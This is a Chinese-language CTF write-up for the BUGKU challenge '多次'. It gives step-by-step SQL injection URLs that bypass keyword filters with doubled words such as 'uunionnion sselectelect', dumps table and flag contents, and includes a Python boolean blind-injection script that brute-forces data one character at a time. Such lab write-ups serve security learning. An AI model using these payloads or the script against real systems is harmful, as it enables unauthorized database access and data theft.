BUGKU 多次 手动注入+脚本盲注

本文内容为SQL手动注入步骤+想法，以及盲注脚本。

 http://123.206.87.240:9004/1ndex.php?id=1 

 http://123.206.87.240:9004/1ndex.php?id=1'  报错

 http://123.206.87.240:9004/1ndex.php?id=1'--+ 正常 存在注入

 http://123.206.87.240:9004/1ndex.php?id=1' and 1=1 --+  报错 and被过滤，

 http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘ 

使用length 判断过滤得出 or union select 被过滤

 http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+  正常 双写绕过

 http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+  报错 存在2个库

 http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,2 --+  正常 回显2号位

对二号位进行注入

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+ 

数据库名 web1002-1

 http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+ 

表名 flag1,hint

 123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+ 

字段 flag1,address

 http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+ 

flag1内容为:usOwycTju+FTUUzXosjr 填入发现不对，题目说有两个flag均为小写

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+ 

address内容为下一关，点击进入下一关地址:http://123.206.87.240:9004/Once_More.php?id=1

 http://123.206.87.240:9004/Once_More.php?id=1'  报错

 http://123.206.87.240:9004/Once_More.php?id=1‘ --+  正常 存在注入

 http://123.206.87.240:9004/Once_More.php?id=1’ order by 2 --+  正常

 http://123.206.87.240:9004/Once_More.php?id=1’ order by 3 --+  报错 存在两个库

 http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘union’)!=0)^’  正常 union被过滤

 http://123.206.87.240:9004/Once_More.php?id=1‘ and 1=2 uunionnion select 1,2 --+  双写无法绕过

 http://123.206.87.240:9004/Once_More.php?id=1’ and 1=2 Union select 1,2 --+  大小写无法绕过

 http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘sleep’)!=0)^’  正常 sleep被过滤 substr也被过滤

由于正确错误返回不同 尝试写脚本Bool盲注

import sys
import requests
from bs4 import BeautifulSoup
import re


url_start = 'http://123.206.87.240:9004/Once_More.php?' 


sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"
sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+"
sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+"
sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"


def Brup(SQL):
    name=''
    for i in range(1,40):
        for ch in range(32,129):
            if ch == 128:
                sys.exit(0)
            payload = SQL.format(i,chr(ch))
            url_all = url_start+payload
            #print(url_all)
            html = requests.get(url_all)
            soup = BeautifulSoup(html.content, 'html.parser')
            result = soup.find_all(text = 'Hello,I Am Here!')
            #判断列表是否为空
            if len(result):
                name += chr(ch)
                print('name:'+name)
                break
        
if __name__ == '__main__':
    #Brup(sqldb)
    #Brup(sqltb)
    #Brup(sqltest)
    Brup(sqlflag)

#tablename：class,flag2
#注:跑出来为大写，flag全为小写。

usOwycTju+FTUUzXosjr

web1002-1